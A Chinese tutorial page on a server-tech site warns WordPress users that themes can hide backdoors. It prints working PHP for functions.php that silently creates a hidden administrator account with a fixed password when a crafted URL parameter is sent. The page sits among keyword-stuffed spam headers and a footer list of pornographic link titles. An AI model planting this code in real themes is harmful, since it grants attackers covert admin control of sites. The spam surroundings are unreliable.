一区二区三区在线-一区二区三区亚洲视频-一区二区三区亚洲-一区二区三区午夜-一区二区三区四区在线视频-一区二区三区四区在线免费观看

服務器之家:專注于服務器技術(shù)及軟件下載分享
分類導航

DEDECMS|帝國CMS|Discuz|PHPCMS|Wordpress|ZBLOG|ECSHOP|蘋果CMS|極致CMS|CMS系統(tǒng)|

服務器之家 - 建站程序 - Wordpress - 防范wordpress主題加后門代碼獲取管理員權(quán)限

防范wordpress主題加后門代碼獲取管理員權(quán)限

2019-09-18 13:42wordpress教程網(wǎng) Wordpress

只需幾行代碼就可以為WordPress主題留下后門,大家要小心了

代碼如下:


add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

 

簡單說明下,代碼主要放于functions.php文件里面,不會影響任何功能使用,如果存在此代碼,任何人只要運行http://www.你的域名.com/?backdoor=go,然后就創(chuàng)建了一個用戶名為“backdoor”,密碼為:“pa55w0rd!” 的管理員。同樣具備管理員的權(quán)限,很編輯主題代碼文件,相信此時你一定感覺到很危險了吧,趕緊檢查檢查自己的主題代碼吧……

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 99精品影院 | 欧美色成人tv在线播放 | 精品视频在线免费观看 | 精品视频一区二区 | 骚虎网站在线观看 | 天天操夜夜操狠狠操 | 午夜福利院电影 | 成人午夜影院在线观看 | 国产特级毛片aaaaaa | 亚裔maricahase和黑人 | 福利一区三区 | 91在线精品国产丝袜超清 | 天码毛片一区二区三区入口 | 精品久久免费视频 | 久久99国产综合精品AV蜜桃 | 四虎永久网址影院 | 亚洲精品视频在线免费 | 天天操婷婷 | bdsm酷刑折磨死美女 | 欧美午夜精品 | yy8090韩国日本三理论免费 | 91精品国产一区 | 欧美精品一线二线大片 | 狠狠草视频 | 天天插在线视频 | 久久免费看少妇高潮A片2012 | 欧美又大又粗又爽视频 | 精品久久免费视频 | 日产中文乱码卡一卡二 | 好女孩韩剧免费观看 | 国产自拍视频一区 | 暖暖中国免费观看高清完整版 | 国产日韩片 | 青青草原在线 | 国产免费一区二区三区 | 亚洲国产精品综合福利专区 | 日韩毛片网 | 欧美精品超清在线播放 | 亚洲成av人片在线观看天堂无码 | 公翁的舌尖研磨她的花蒂小说 | 99精品在线视频 |